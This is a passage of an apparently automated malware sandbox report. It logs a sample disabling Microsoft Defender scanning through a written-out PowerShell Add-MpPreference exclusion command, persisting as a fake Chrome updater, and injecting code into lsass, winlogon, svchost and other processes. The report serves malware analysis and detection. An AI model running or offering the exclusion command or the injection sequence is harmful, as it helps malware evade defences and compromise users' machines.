                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4814B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000026F4814B50C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F48147E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000026F48147E70
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B92347E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0000029B92347E70
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9234B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0000029B9234B50C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0000029B923A7E70
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0000029B923AB50C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000020422AAB50C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000020422AA7E70
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000206287B7E70
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000206287BB50C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_0000028471397E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000028471397E70
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847139B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002847139B50C
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829254B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001829254B50C
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_0000018292547E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0000018292547E70
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001BB3DA67E70
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001BB3DA6B50C
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000029ABCF4B50C
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000029ABCF47E70
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0000025E81DD7E70
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0000025E81DDB50C
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD87E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001CD9AD87E70
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD8B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001CD9AD8B50C
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C39B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002AF8C39B50C
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C397E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002AF8C397E70

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2EA8A660000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1CB338B0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26E02790000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1C6CEEE0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25304F80000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16C21130000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26F47BD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29B91DD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 204227B0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20628780000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 182924D0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471250000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB3D3C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29ABCEE0000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2EA8A6E0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1CB33910000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26E033A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1C6CEF40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25305540000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16C21190000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26F48170000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29B92370000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20422AD0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20628E80000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18292570000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB3DA90000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29ABCF10000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD9AD50000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AF8C360000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 145854A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2CC6C080000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A6E9540000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BC418A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19D14D00000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2251FF40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24CD3730000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2259C5B0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23504770000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22903F80000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2158FFB0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FD855A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2995E1C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A880020000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: E60000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E5EB130000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13949580000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 295CE1B0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2251A000000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2481AE30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D0873D0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 2527E340000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20217280000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26C3B960000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB42B30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19116860000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D05730000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E30EAE0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 238FF4E0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D509FC0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1DC06A00000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15E4FFA0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C4A5A70000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14D18D60000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23CDFD30000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B7A1980000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1A53D510000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E88D40000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 8EC0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C72BA0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CF2C040000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B555D60000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18EDC3D0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 153541C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20B142B0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 225E6D70000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 195B0560000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 219434A0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B118D70000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F933320000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F9683C0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1E47CB90000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2673DA80000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 21A21380000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1CE44C00000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 155B4770000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 255FC740000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D3F800000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471970000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3A67E0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25E81DA0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC1A070000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1AE13BC0000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 21FBD160000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20C8C170000 protect: page execute and read and write
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,5_2_00007FF67E6C1DB4
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 8A662908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: 338B2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2792908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: CEEE2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4F82908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 21132908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 47BD2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 91DD2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 227B2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 28782908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 71252908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 924D2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 3D3C2908Jump to behavior
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8A6E2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33912908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33A2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CEF42908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5542908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 21192908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 48172908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 92372908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 22AD2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 28E82908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 92572908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3DA92908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BCF12908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9AD52908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C362908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 854A2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6C082908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E9542908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 418A2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 14D02908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 1FF42908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D3732908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9C5B2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4772908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 3F82908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8FFB2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 855A2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5E1C2908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 80022908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\spoolsv.exe EIP: E62908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: EB132908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49582908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE1B2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A002908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 1AE32908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 873D2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E342908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 17282908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B962908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 42B32908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 16862908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5732908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EAE2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF4E2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9FC2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6A02908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4FFA2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A5A72908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 18D62908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DFD32908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A1982908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3D512908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 88D42908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8EC2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 72BA2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C042908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 55D62908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC3D2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 541C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 142B2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E6D72908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B0562908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 434A2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 18D72908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33322908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683C2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7CB92908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3DA82908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 21382908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 44C02908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B4772908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC742908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3F802908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 71972908
                Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: 81DA2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A072908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13BC2908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BD162908
                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C172908
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeNtAdjustPrivilegesToken: Direct from: 0x7FF6DD485C5EJump to behavior
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeNtQuerySystemInformation: Direct from: 0x7FF752A45C5EJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2EA8A660000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1CB338B0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E02790000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1C6CEEE0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25304F80000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16C21130000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F47BD0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B91DD0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 204227B0000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20628780000 value starts with: 4D5AJump to behavior
